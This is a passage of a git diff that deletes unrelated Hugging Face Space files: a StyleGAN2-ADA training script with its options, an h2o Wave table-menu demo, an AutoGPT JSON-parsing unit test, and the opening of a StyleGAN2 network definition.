{args.training_set_kwargs.max_size}') - desc += f'-subset{subset}' - if subset < args.training_set_kwargs.max_size: - args.training_set_kwargs.max_size = subset - args.training_set_kwargs.random_seed = args.random_seed - - if mirror is None: - mirror = False - assert isinstance(mirror, bool) - if mirror: - desc += '-mirror' - args.training_set_kwargs.xflip = True - - # ------------------------------------ - # Base config: cfg, gamma, kimg, batch - # ------------------------------------ - - if cfg is None: - cfg = 'auto' - assert isinstance(cfg, str) - desc += f'-{cfg}' - - cfg_specs = { - 'auto': dict(ref_gpus=-1, kimg=25000, mb=-1, mbstd=-1, 
fmaps=-1, lrate=-1, gamma=-1, ema=-1, ramp=0.05, map=2), - # Populated dynamically based on resolution and GPU count. - 'shhq': dict(ref_gpus=-1, kimg=25000, mb=-1, mbstd=-1, fmaps=-1, lrate=-1, gamma=-1, ema=-1, ramp=0.05, map=8), - # Uses mixed-precision, unlike the original StyleGAN2. - 'stylegan2': dict(ref_gpus=8, kimg=25000, mb=32, mbstd=4, fmaps=1, lrate=0.002, gamma=10, ema=10, ramp=None, map=8), - 'paper256': dict(ref_gpus=8, kimg=25000, mb=64, mbstd=8, fmaps=0.5, lrate=0.0025, gamma=1, ema=20, ramp=None, map=8), - 'paper512': dict(ref_gpus=8, kimg=25000, mb=64, mbstd=8, fmaps=1, lrate=0.0025, gamma=0.5, ema=20, ramp=None, map=8), - 'paper1024': dict(ref_gpus=8, kimg=25000, mb=32, mbstd=4, fmaps=1, lrate=0.002, gamma=2, ema=10, ramp=None, map=8), - 'cifar': dict(ref_gpus=2, kimg=100000, mb=64, mbstd=32, fmaps=1, lrate=0.0025, gamma=0.01, ema=500, ramp=0.05, map=2), - } - - assert cfg in cfg_specs - spec = dnnlib.EasyDict(cfg_specs[cfg]) - if cfg == 'auto' or cfg == 'shhq': - desc += f'{gpus:d}' - spec.ref_gpus = gpus - res = args.training_set_kwargs.resolution - # keep gpu memory consumption at bay - spec.mb = max(min(gpus * min(4096 // res, 32), 64), gpus) - # other hyperparams behave more predictably if mbstd group size remains fixed - spec.mbstd = min(spec.mb // gpus, 4) - spec.fmaps = 1 if res >= 512 else 0.5 - spec.lrate = 0.002 if res >= 1024 else 0.0025 - spec.gamma = 0.0002 * (res ** 2) / spec.mb # heuristic formula - spec.ema = spec.mb * 10 / 32 - - args.G_kwargs = dnnlib.EasyDict(class_name='training.networks.Generator', z_dim=512, w_dim=512, - mapping_kwargs=dnnlib.EasyDict(), synthesis_kwargs=dnnlib.EasyDict(), square=square) - args.D_kwargs = dnnlib.EasyDict(class_name='training.networks.Discriminator', block_kwargs=dnnlib.EasyDict( - ), mapping_kwargs=dnnlib.EasyDict(), epilogue_kwargs=dnnlib.EasyDict(), square=square) - args.G_kwargs.synthesis_kwargs.channel_base = args.D_kwargs.channel_base = int( - spec.fmaps * 32768) - args.G_kwargs.synthesis_kwargs.channel_max = args.D_kwargs.channel_max = 512 - args.G_kwargs.mapping_kwargs.num_layers = spec.map - # enable mixed-precision training - args.G_kwargs.synthesis_kwargs.num_fp16_res = args.D_kwargs.num_fp16_res = 4 - # clamp activations to avoid float16 overflow - args.G_kwargs.synthesis_kwargs.conv_clamp = args.D_kwargs.conv_clamp = 256 - args.D_kwargs.epilogue_kwargs.mbstd_group_size = spec.mbstd - - args.G_opt_kwargs = dnnlib.EasyDict( - class_name='torch.optim.Adam', lr=spec.lrate, betas=[0, 0.99], eps=1e-8) - args.D_opt_kwargs = dnnlib.EasyDict( - class_name='torch.optim.Adam', lr=spec.lrate, betas=[0, 0.99], eps=1e-8) - args.loss_kwargs = dnnlib.EasyDict( - class_name='training.loss.StyleGAN2Loss', r1_gamma=spec.gamma) - - args.total_kimg = spec.kimg - args.batch_size = spec.mb - args.batch_gpu = spec.mb // spec.ref_gpus - args.ema_kimg = spec.ema - args.ema_rampup = spec.ramp - - if cfg == 'cifar': - args.loss_kwargs.pl_weight = 0 # disable path length regularization - args.loss_kwargs.style_mixing_prob = 0 # disable style mixing - args.D_kwargs.architecture = 'orig' # disable residual skip connections - - if gamma is not None: - assert isinstance(gamma, float) - if not gamma >= 0: - raise UserError('--gamma must be non-negative') - desc += f'-gamma{gamma:g}' - args.loss_kwargs.r1_gamma = gamma - - if kimg is not None: - assert isinstance(kimg, int) - if not kimg >= 1: - raise UserError('--kimg must be at least 1') - desc += f'-kimg{kimg:d}' - args.total_kimg = kimg - - if batch is not None: - assert 
isinstance(batch, int) - if not (batch >= 1 and batch % gpus == 0): - raise UserError( - '--batch must be at least 1 and divisible by --gpus') - desc += f'-batch{batch}' - args.batch_size = batch - args.batch_gpu = batch // gpus - - # --------------------------------------------------- - # Discriminator augmentation: aug, p, target, augpipe - # --------------------------------------------------- - - if aug is None: - aug = 'ada' - else: - assert isinstance(aug, str) - desc += f'-{aug}' - - if aug == 'ada': - args.ada_target = 0.6 - - elif aug == 'noaug': - pass - - elif aug == 'fixed': - if p is None: - raise UserError(f'--aug={aug} requires specifying --p') - - else: - raise UserError(f'--aug={aug} not supported') - - if p is not None: - assert isinstance(p, float) - if aug != 'fixed': - raise UserError('--p can only be specified with --aug=fixed') - if not 0 <= p <= 1: - raise UserError('--p must be between 0 and 1') - desc += f'-p{p:g}' - args.augment_p = p - - if target is not None: - assert isinstance(target, float) - if aug != 'ada': - raise UserError('--target can only be specified with --aug=ada') - if not 0 <= target <= 1: - raise UserError('--target must be between 0 and 1') - desc += f'-target{target:g}' - args.ada_target = target - - assert augpipe is None or isinstance(augpipe, str) - if augpipe is None: - augpipe = 'bgc' - else: - if aug == 'noaug': - raise UserError('--augpipe cannot be specified with --aug=noaug') - desc += f'-{augpipe}' - - augpipe_specs = { - 'blit': dict(xflip=1, rotate90=1, xint=1), - 'geom': dict(scale=1, rotate=1, aniso=1, xfrac=1), - 'color': dict(brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1), - 'filter': dict(imgfilter=1), - 'noise': dict(noise=1), - 'cutout': dict(cutout=1), - 'bg': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1), - 'bgc': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1), - 'bgcf': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1, imgfilter=1), - 'bgcfn': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1, imgfilter=1, noise=1), - 'bgcfnc': dict(xflip=1, rotate90=1, xint=1, scale=1, rotate=1, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1, imgfilter=1, noise=1, cutout=1), - 'body': dict(xflip=1, rotate90=0, xint=1, scale=1, rotate=0, aniso=1, xfrac=1, brightness=1, contrast=1, lumaflip=1, hue=1, saturation=1) - } - - assert augpipe in augpipe_specs - if aug != 'noaug': - args.augment_kwargs = dnnlib.EasyDict( - class_name='training.augment.AugmentPipe', **augpipe_specs[augpipe]) - - # ---------------------------------- - # Transfer learning: resume, freezed - # ---------------------------------- - - resume_specs = { - 'ffhq256': 'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res256-mirror-paper256-noaug.pkl', - 'ffhq512': 'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res512-mirror-stylegan2-noaug.pkl', - 'ffhq1024': 'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/ffhq-res1024-mirror-stylegan2-noaug.pkl', - 'celebahq256': 
'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/celebahq-res256-mirror-paper256-kimg100000-ada-target0.5.pkl', - 'lsundog256': 'https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/transfer-learning-source-nets/lsundog-res256-paper256-kimg100000-noaug.pkl', - } - - assert resume is None or isinstance(resume, str) - if resume is None: - resume = 'noresume' - elif resume == 'noresume': - desc += '-noresume' - elif resume in resume_specs: - desc += f'-resume{resume}' - args.resume_pkl = resume_specs[resume] # predefined url - else: - desc += '-resumecustom' - args.resume_pkl = resume # custom path or url - - if resume != 'noresume': - args.ada_kimg = 100 # make ADA react faster at the beginning - args.ema_rampup = None # disable EMA rampup - - if freezed is not None: - assert isinstance(freezed, int) - if not freezed >= 0: - raise UserError('--freezed must be non-negative') - desc += f'-freezed{freezed:d}' - args.D_kwargs.block_kwargs.freeze_layers = freezed - - # ------------------------------------------------- - # Performance options: fp32, nhwc, nobench, workers - # ------------------------------------------------- - - if fp32 is None: - fp32 = False - assert isinstance(fp32, bool) - if fp32: - args.G_kwargs.synthesis_kwargs.num_fp16_res = args.D_kwargs.num_fp16_res = 0 - args.G_kwargs.synthesis_kwargs.conv_clamp = args.D_kwargs.conv_clamp = None - - if nhwc is None: - nhwc = False - assert isinstance(nhwc, bool) - if nhwc: - args.G_kwargs.synthesis_kwargs.fp16_channels_last = args.D_kwargs.block_kwargs.fp16_channels_last = True - - if nobench is None: - nobench = False - assert isinstance(nobench, bool) - if nobench: - args.cudnn_benchmark = False - - if allow_tf32 is None: - allow_tf32 = False - assert isinstance(allow_tf32, bool) - if allow_tf32: - args.allow_tf32 = True - - if workers is not None: - assert isinstance(workers, int) - if not workers >= 1: - raise UserError('--workers must be at least 1') - args.data_loader_kwargs.num_workers = workers - - return desc, args - -# ---------------------------------------------------------------------------- - - -def subprocess_fn(rank, args, temp_dir): - dnnlib.util.Logger(file_name=os.path.join( - args.run_dir, 'log.txt'), file_mode='a', should_flush=True) - - # Init torch.distributed. - if args.num_gpus > 1: - init_file = os.path.abspath(os.path.join( - temp_dir, '.torch_distributed_init')) - if os.name == 'nt': - init_method = 'file:///' + init_file.replace('\\', '/') - torch.distributed.init_process_group( - backend='gloo', init_method=init_method, rank=rank, world_size=args.num_gpus) - else: - init_method = f'file://{init_file}' - torch.distributed.init_process_group( - backend='nccl', init_method=init_method, rank=rank, world_size=args.num_gpus) - - # Init torch_utils. - sync_device = torch.device('cuda', rank) if args.num_gpus > 1 else None - training_stats.init_multiprocessing(rank=rank, sync_device=sync_device) - if rank != 0: - custom_ops.verbosity = 'none' - - # Execute training loop. 
- training_loop.training_loop(rank=rank, **args) - -# ---------------------------------------------------------------------------- - - -class CommaSeparatedList(click.ParamType): - name = 'list' - - def convert(self, value, param, ctx): - _ = param, ctx - if value is None or value.lower() == 'none' or value == '': - return [] - return value.split(',') - -# ---------------------------------------------------------------------------- - - -@click.command() -@click.pass_context -# General options. -@click.option('--outdir', help='Where to save the results', required=True, metavar='DIR') -@click.option('--gpus', help='Number of GPUs to use [default: 1]', type=int, metavar='INT') -@click.option('--snap', help='Snapshot interval [default: 50 ticks]', type=int, metavar='INT') -@click.option('--metrics', help='Comma-separated list or "none" [default: fid50k_full]', type=CommaSeparatedList()) -@click.option('--seed', help='Random seed [default: 0]', type=int, metavar='INT') -@click.option('-n', '--dry-run', help='Print training options and exit', is_flag=True) -# Dataset. -@click.option('--data', help='Training data (directory or zip)', metavar='PATH', required=True) -@click.option('--cond', help='Train conditional model based on dataset labels [default: false]', type=bool, metavar='BOOL') -@click.option('--subset', help='Train with only N images [default: all]', type=int, metavar='INT') -@click.option('--mirror', help='Enable dataset x-flips [default: false]', type=bool, metavar='BOOL') -@click.option('--square', help='True for square, False for rectangle', type=bool, metavar='BOOL', default=False) -# Base config. -@click.option('--cfg', help='Base config [default: auto]', type=click.Choice(['auto', 'stylegan2', 'paper256', 'paper512', 'paper1024', 'cifar', 'shhq'])) -@click.option('--gamma', help='Override R1 gamma', type=float) -@click.option('--kimg', help='Override training duration', type=int, metavar='INT') -@click.option('--batch', help='Override batch size', type=int, metavar='INT') -# Discriminator augmentation. -@click.option('--aug', help='Augmentation mode [default: ada]', type=click.Choice(['noaug', 'ada', 'fixed'])) -@click.option('--p', help='Augmentation probability for --aug=fixed', type=float) -@click.option('--target', help='ADA target value for --aug=ada', type=float) -@click.option('--augpipe', help='Augmentation pipeline [default: bgc]', type=click.Choice(['blit', 'geom', 'color', 'filter', 'noise', 'cutout', 'bg', 'bgc', 'bgcf', 'bgcfn', 'bgcfnc', 'body'])) -# Transfer learning. -@click.option('--resume', help='Resume training [default: noresume]', metavar='PKL') -@click.option('--freezed', help='Freeze-D [default: 0 layers]', type=int, metavar='INT') -# Performance options. -@click.option('--fp32', help='Disable mixed-precision training', type=bool, metavar='BOOL') -@click.option('--nhwc', help='Use NHWC memory format with FP16', type=bool, metavar='BOOL') -@click.option('--nobench', help='Disable cuDNN benchmarking', type=bool, metavar='BOOL') -@click.option('--allow-tf32', help='Allow PyTorch to use TF32 internally', type=bool, metavar='BOOL') -@click.option('--workers', help='Override number of DataLoader workers', type=int, metavar='INT') -def main(ctx, outdir, dry_run, **config_kwargs): - """Train a GAN using the techniques described in the paper - "Training Generative Adversarial Networks with Limited Data". - - Examples: - - \b - # Train with custom dataset using 1 GPU. 
- python train.py --outdir=~/training-runs --data=~/mydataset.zip --gpus=1 - - \b - # Train class-conditional CIFAR-10 using 2 GPUs. - python train.py --outdir=~/training-runs --data=~/datasets/cifar10.zip \\ - --gpus=2 --cfg=cifar --cond=1 - - \b - # Transfer learn MetFaces from FFHQ using 4 GPUs. - python train.py --outdir=~/training-runs --data=~/datasets/metfaces.zip \\ - --gpus=4 --cfg=paper1024 --mirror=1 --resume=ffhq1024 --snap=10 - - \b - # Reproduce original StyleGAN2 config F. - python train.py --outdir=~/training-runs --data=~/datasets/ffhq.zip \\ - --gpus=8 --cfg=stylegan2 --mirror=1 --aug=noaug - - \b - Base configs (--cfg): - auto Automatically select reasonable defaults based on resolution - and GPU count. Good starting point for new datasets. - stylegan2 Reproduce results for StyleGAN2 config F at 1024x1024. - paper256 Reproduce results for FFHQ and LSUN Cat at 256x256. - paper512 Reproduce results for BreCaHAD and AFHQ at 512x512. - paper1024 Reproduce results for MetFaces at 1024x1024. - cifar Reproduce results for CIFAR-10 at 32x32. - - \b - Transfer learning source networks (--resume): - ffhq256 FFHQ trained at 256x256 resolution. - ffhq512 FFHQ trained at 512x512 resolution. - ffhq1024 FFHQ trained at 1024x1024 resolution. - celebahq256 CelebA-HQ trained at 256x256 resolution. - lsundog256 LSUN Dog trained at 256x256 resolution. - Custom network pickle. - """ - dnnlib.util.Logger(should_flush=True) - - # Setup training options. - try: - run_desc, args = setup_training_loop_kwargs(**config_kwargs) - except UserError as err: - ctx.fail(err) - - # Pick output directory. - prev_run_dirs = [] - if os.path.isdir(outdir): - prev_run_dirs = [x for x in os.listdir( - outdir) if os.path.isdir(os.path.join(outdir, x))] - prev_run_ids = [re.match(r'^\d+', x) for x in prev_run_dirs] - prev_run_ids = [int(x.group()) for x in prev_run_ids if x is not None] - cur_run_id = max(prev_run_ids, default=-1) + 1 - args.run_dir = os.path.join(outdir, f'{cur_run_id:05d}-{run_desc}') - assert not os.path.exists(args.run_dir) - - # Print options. - print() - print('Training options:') - print(json.dumps(args, indent=2)) - print() - print(f'Output directory: {args.run_dir}') - print(f'Training data: {args.training_set_kwargs.path}') - print(f'Training duration: {args.total_kimg} kimg') - print(f'Number of GPUs: {args.num_gpus}') - print(f'Number of images: {args.training_set_kwargs.max_size}') - print(f'Image resolution: {args.training_set_kwargs.resolution}') - print(f'Conditional model: {args.training_set_kwargs.use_labels}') - print(f'Dataset x-flips: {args.training_set_kwargs.xflip}') - print() - - # Dry run? - if dry_run: - print('Dry run; exiting.') - return - - # Create output directory. - print('Creating output directory...') - os.makedirs(args.run_dir, exist_ok=True) - with open(os.path.join(args.run_dir, 'training_options.json'), 'wt') as f: - json.dump(args, f, indent=2) - - # Launch processes. 
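    # A single-GPU run calls subprocess_fn() directly in this process; multi-GPU runs spawn one
    # child per GPU with the 'spawn' start method and share a temporary directory for the
    # file-based torch.distributed rendezvous set up in subprocess_fn().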
- print('Launching processes...') - torch.multiprocessing.set_start_method('spawn') - with tempfile.TemporaryDirectory() as temp_dir: - if args.num_gpus == 1: - subprocess_fn(rank=0, args=args, temp_dir=temp_dir) - else: - torch.multiprocessing.spawn(fn=subprocess_fn, args=( - args, temp_dir), nprocs=args.num_gpus) - -# ---------------------------------------------------------------------------- - - -if __name__ == "__main__": - main() # pylint: disable=no-value-for-parameter - -# ---------------------------------------------------------------------------- diff --git a/spaces/h2oai/wave-tour/examples/table_menu.py b/spaces/h2oai/wave-tour/examples/table_menu.py deleted file mode 100644 index a39127015da42b2f407b3ace6d8ae851c0f23ff9..0000000000000000000000000000000000000000 --- a/spaces/h2oai/wave-tour/examples/table_menu.py +++ /dev/null @@ -1,64 +0,0 @@ -# Table / Menu -# Allow group of commands with context menu for each row. -# #table #commands #menu -# --- -from h2o_wave import main, app, Q, ui -from faker import Faker - -fake = Faker() - - -class TableRow: - _id = 0 - - def __init__(self): - TableRow._id += 1 - self.id = f'row_{TableRow._id}' - self.name = f'{fake.first_name()} {fake.last_name()}' - self.details = fake.sentence() - - -def show_table(q) -> None: - q.page['example'] = ui.form_card(box='1 1 4 4', items=[ - ui.table( - name='table', - columns=[ - ui.table_column(name='name', label='Name'), - ui.table_column( - name='actions', label='Actions', - cell_type=ui.menu_table_cell_type(name='commands', commands=[ - ui.command(name='details', label='Details'), - ui.command(name='delete', label='Delete'), - ]) - ) - ], - rows=[ui.table_row(name=r.id, cells=[r.name]) for r in q.client.rows] - ) - ]) - - -@app('/demo') -async def serve(q: Q): - if not q.app.initialized: - q.app.rows = [TableRow() for _ in range(3)] - q.app.initialized = True - if not q.client.initialized: - q.client.rows = q.app.rows - show_table(q) - q.client.initialized = True - - if q.args.delete: - q.client.rows = [row for row in q.client.rows if row.id != q.args.delete] - q.page['example'].table.rows = [ui.table_row(name=r.id, cells=[r.name]) for r in q.client.rows] - if q.args.details: - for row in q.client.rows: - if row.id == q.args.details: - q.page['example'] = ui.form_card(box='1 1 4 4', items=[ - ui.text(name='details', content=row.details), - ui.button(name='back', label='Back') - ]) - break - if q.args.back: - show_table(q) - - await q.page.save() diff --git a/spaces/hamelcubsfan/AutoGPT/tests/test_json_parser.py b/spaces/hamelcubsfan/AutoGPT/tests/test_json_parser.py deleted file mode 100644 index 41c90a6f66c0b0468f1443de80033cc4f268eca0..0000000000000000000000000000000000000000 --- a/spaces/hamelcubsfan/AutoGPT/tests/test_json_parser.py +++ /dev/null @@ -1,111 +0,0 @@ -import unittest - -import tests.context -from autogpt.json_utils.json_fix_llm import fix_and_parse_json - - -class TestParseJson(unittest.TestCase): - def test_valid_json(self): - # Test that a valid JSON string is parsed correctly - json_str = '{"name": "John", "age": 30, "city": "New York"}' - obj = fix_and_parse_json(json_str) - self.assertEqual(obj, {"name": "John", "age": 30, "city": "New York"}) - - def test_invalid_json_minor(self): - # Test that an invalid JSON string can be fixed with gpt - json_str = '{"name": "John", "age": 30, "city": "New York",}' - with self.assertRaises(Exception): - fix_and_parse_json(json_str, try_to_fix_with_gpt=False) - - def test_invalid_json_major_with_gpt(self): - # Test that an invalid JSON string 
raises an error when try_to_fix_with_gpt is False - json_str = 'BEGIN: "name": "John" - "age": 30 - "city": "New York" :END' - with self.assertRaises(Exception): - fix_and_parse_json(json_str, try_to_fix_with_gpt=False) - - def test_invalid_json_major_without_gpt(self): - # Test that a REALLY invalid JSON string raises an error when try_to_fix_with_gpt is False - json_str = 'BEGIN: "name": "John" - "age": 30 - "city": "New York" :END' - # Assert that this raises an exception: - with self.assertRaises(Exception): - fix_and_parse_json(json_str, try_to_fix_with_gpt=False) - - def test_invalid_json_leading_sentence_with_gpt(self): - # Test that a REALLY invalid JSON string raises an error when try_to_fix_with_gpt is False - json_str = """I suggest we start by browsing the repository to find any issues that we can fix. - -{ - "command": { - "name": "browse_website", - "args":{ - "url": "https://github.com/Torantulino/Auto-GPT" - } - }, - "thoughts": - { - "text": "I suggest we start browsing the repository to find any issues that we can fix.", - "reasoning": "Browsing the repository will give us an idea of the current state of the codebase and identify any issues that we can address to improve the repo.", - "plan": "- Look through the repository to find any issues.\n- Investigate any issues to determine what needs to be fixed\n- Identify possible solutions to fix the issues\n- Open Pull Requests with fixes", - "criticism": "I should be careful while browsing so as not to accidentally introduce any new bugs or issues.", - "speak": "I will start browsing the repository to find any issues we can fix." - } -}""" - good_obj = { - "command": { - "name": "browse_website", - "args": {"url": "https://github.com/Torantulino/Auto-GPT"}, - }, - "thoughts": { - "text": "I suggest we start browsing the repository to find any issues that we can fix.", - "reasoning": "Browsing the repository will give us an idea of the current state of the codebase and identify any issues that we can address to improve the repo.", - "plan": "- Look through the repository to find any issues.\n- Investigate any issues to determine what needs to be fixed\n- Identify possible solutions to fix the issues\n- Open Pull Requests with fixes", - "criticism": "I should be careful while browsing so as not to accidentally introduce any new bugs or issues.", - "speak": "I will start browsing the repository to find any issues we can fix.", - }, - } - # Assert that this raises an exception: - self.assertEqual( - fix_and_parse_json(json_str, try_to_fix_with_gpt=False), good_obj - ) - - def test_invalid_json_leading_sentence_with_gpt(self): - # Test that a REALLY invalid JSON string raises an error when try_to_fix_with_gpt is False - json_str = """I will first need to browse the repository (https://github.com/Torantulino/Auto-GPT) and identify any potential bugs that need fixing. I will use the "browse_website" command for this. - -{ - "command": { - "name": "browse_website", - "args":{ - "url": "https://github.com/Torantulino/Auto-GPT" - } - }, - "thoughts": - { - "text": "Browsing the repository to identify potential bugs", - "reasoning": "Before fixing bugs, I need to identify what needs fixing. I will use the 'browse_website' command to analyze the repository.", - "plan": "- Analyze the repository for potential bugs and areas of improvement", - "criticism": "I need to ensure I am thorough and pay attention to detail while browsing the repository.", - "speak": "I am browsing the repository to identify potential bugs." 
- } -}""" - good_obj = { - "command": { - "name": "browse_website", - "args": {"url": "https://github.com/Torantulino/Auto-GPT"}, - }, - "thoughts": { - "text": "Browsing the repository to identify potential bugs", - "reasoning": "Before fixing bugs, I need to identify what needs fixing. I will use the 'browse_website' command to analyze the repository.", - "plan": "- Analyze the repository for potential bugs and areas of improvement", - "criticism": "I need to ensure I am thorough and pay attention to detail while browsing the repository.", - "speak": "I am browsing the repository to identify potential bugs.", - }, - } - # Assert that this raises an exception: - self.assertEqual( - fix_and_parse_json(json_str, try_to_fix_with_gpt=False), good_obj - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/hamzapehlivan/StyleRes/models/stylegan2.py b/spaces/hamzapehlivan/StyleRes/models/stylegan2.py deleted file mode 100644 index 7c87996e44e507c5262233eeb38cdb3bf89310ab..0000000000000000000000000000000000000000 --- a/spaces/hamzapehlivan/StyleRes/models/stylegan2.py +++ /dev/null @@ -1,965 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Network architectures from the paper -"Analyzing and Improving the Image Quality of StyleGAN". -Matches the original implementation of configs E-F by Karras et al. at -https://github.com/NVlabs/stylegan2/blob/master/training/networks_stylegan2.py""" - -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -from .torch_utils import misc -from .torch_utils.ops import conv2d_resample -from .torch_utils.ops import upfirdn2d -from .torch_utils.ops import bias_act -from .torch_utils.ops import fma - -#---------------------------------------------------------------------------- - - -def normalize_2nd_moment(x, dim=1, eps=1e-8): - return x * (x.square().mean(dim=dim, keepdim=True) + eps).rsqrt() - -#---------------------------------------------------------------------------- - - -def modulated_conv2d( - x, # Input tensor of shape [batch_size, in_channels, in_height, in_width]. - weight, # Weight tensor of shape [out_channels, in_channels, kernel_height, kernel_width]. - styles, # Modulation coefficients of shape [batch_size, in_channels]. - noise = None, # Optional noise tensor to add to the output activations. - up = 1, # Integer upsampling factor. - down = 1, # Integer downsampling factor. - padding = 0, # Padding with respect to the upsampled image. - resample_filter = None, # Low-pass filter to apply when resampling activations. Must be prepared beforehand by calling upfirdn2d.setup_filter(). - demodulate = True, # Apply weight demodulation? - flip_weight = True, # False = convolution, True = correlation (matches torch.nn.functional.conv2d). - fused_modconv = True, # Perform modulation, convolution, and demodulation as a single fused operation? 
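    # Optional per-sample kernel offsets (HyperStyle-style refinement): when given, the base
    # weight is scaled by (1 + delta) in addition to the per-sample styles before demodulation.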
- weigth_deltas = None -): - batch_size = x.shape[0] - out_channels, in_channels, kh, kw = weight.shape - misc.assert_shape(weight, [out_channels, in_channels, kh, kw]) # [OIkk] - misc.assert_shape(x, [batch_size, in_channels, None, None]) # [NIHW] - misc.assert_shape(styles, [batch_size, in_channels]) # [NI] - - # Pre-normalize inputs to avoid FP16 overflow. - if x.dtype == torch.float16 and demodulate: - weight = weight * (1 / np.sqrt(in_channels * kh * kw) / weight.norm(float('inf'), dim=[1,2,3], keepdim=True)) # max_Ikk - styles = styles / styles.norm(float('inf'), dim=1, keepdim=True) # max_I - - # Calculate per-sample weights and demodulation coefficients. - w = None - dcoefs = None - if demodulate or fused_modconv: - w = weight.unsqueeze(0) # [NOIkk] - #HyperStyle Addition for the Generator - if weigth_deltas is None: - w = w * styles.reshape(batch_size, 1, -1, 1, 1) # [NOIkk] - else: - w = w * (1 + weigth_deltas) * styles.reshape(batch_size, 1, -1, 1, 1) - if demodulate: - dcoefs = (w.square().sum(dim=[2,3,4]) + 1e-8).rsqrt() # [NO] - if demodulate and fused_modconv: - w = w * dcoefs.reshape(batch_size, -1, 1, 1, 1) # [NOIkk] - - # Execute by scaling the activations before and after the convolution. - if not fused_modconv: - x = x * styles.to(x.dtype).reshape(batch_size, -1, 1, 1) - x = conv2d_resample.conv2d_resample(x=x, w=weight.to(x.dtype), f=resample_filter, up=up, down=down, padding=padding, flip_weight=flip_weight) - if demodulate and noise is not None: - x = fma.fma(x, dcoefs.to(x.dtype).reshape(batch_size, -1, 1, 1), noise.to(x.dtype)) - elif demodulate: - x = x * dcoefs.to(x.dtype).reshape(batch_size, -1, 1, 1) - elif noise is not None: - x = x.add_(noise.to(x.dtype)) - return x - - # Execute as one fused op using grouped convolution. - with misc.suppress_tracer_warnings(): # this value will be treated as a constant - batch_size = int(batch_size) - misc.assert_shape(x, [batch_size, in_channels, None, None]) - x = x.reshape(1, -1, *x.shape[2:]) - w = w.reshape(-1, in_channels, kh, kw) - x = conv2d_resample.conv2d_resample(x=x, w=w.to(x.dtype), f=resample_filter, up=up, down=down, padding=padding, groups=batch_size, flip_weight=flip_weight) - x = x.reshape(batch_size, -1, *x.shape[2:]) - if noise is not None: - x = x.add_(noise) - return x - -#---------------------------------------------------------------------------- - - -class FullyConnectedLayer(torch.nn.Module): - def __init__(self, - in_features, # Number of input features. - out_features, # Number of output features. - bias = True, # Apply additive bias before the activation function? - activation = 'linear', # Activation function: 'relu', 'lrelu', etc. - lr_multiplier = 1, # Learning rate multiplier. - bias_init = 0, # Initial value for the additive bias. 
- ): - super().__init__() - self.in_features = in_features - self.out_features = out_features - self.activation = activation - self.weight = torch.nn.Parameter(torch.randn([out_features, in_features]) / lr_multiplier) - self.bias = torch.nn.Parameter(torch.full([out_features], np.float32(bias_init))) if bias else None - self.weight_gain = lr_multiplier / np.sqrt(in_features) - self.bias_gain = lr_multiplier - - def forward(self, x): - w = self.weight.to(x.dtype) * self.weight_gain - b = self.bias - if b is not None: - b = b.to(x.dtype) - if self.bias_gain != 1: - b = b * self.bias_gain - - if self.activation == 'linear' and b is not None: - x = torch.addmm(b.unsqueeze(0), x, w.t()) - else: - x = x.matmul(w.t()) - x = bias_act.bias_act(x, b, act=self.activation) - return x - - def extra_repr(self): - return f'in_features={self.in_features:d}, out_features={self.out_features:d}, activation={self.activation:s}' - -#---------------------------------------------------------------------------- - - -class Conv2dLayer(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - out_channels, # Number of output channels. - kernel_size, # Width and height of the convolution kernel. - bias = True, # Apply additive bias before the activation function? - activation = 'linear', # Activation function: 'relu', 'lrelu', etc. - up = 1, # Integer upsampling factor. - down = 1, # Integer downsampling factor. - resample_filter = [1,3,3,1], # Low-pass filter to apply when resampling activations. - conv_clamp = None, # Clamp the output to +-X, None = disable clamping. - channels_last = False, # Expect the input to have memory_format=channels_last? - trainable = True, # Update the weights of this layer during training? - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.activation = activation - self.up = up - self.down = down - self.conv_clamp = conv_clamp - self.register_buffer('resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.padding = kernel_size // 2 - self.weight_gain = 1 / np.sqrt(in_channels * (kernel_size ** 2)) - self.act_gain = bias_act.activation_funcs[activation].def_gain - - memory_format = torch.channels_last if channels_last else torch.contiguous_format - weight = torch.randn([out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format) - bias = torch.zeros([out_channels]) if bias else None - if trainable: - self.weight = torch.nn.Parameter(weight) - self.bias = torch.nn.Parameter(bias) if bias is not None else None - else: - self.register_buffer('weight', weight) - if bias is not None: - self.register_buffer('bias', bias) - else: - self.bias = None - - def forward(self, x, gain=1): - w = self.weight * self.weight_gain - b = self.bias.to(x.dtype) if self.bias is not None else None - flip_weight = (self.up == 1) # slightly faster - x = conv2d_resample.conv2d_resample(x=x, w=w.to(x.dtype), f=self.resample_filter, up=self.up, down=self.down, padding=self.padding, flip_weight=flip_weight) - - act_gain = self.act_gain * gain - act_clamp = self.conv_clamp * gain if self.conv_clamp is not None else None - x = bias_act.bias_act(x, b, act=self.activation, gain=act_gain, clamp=act_clamp) - return x - - def 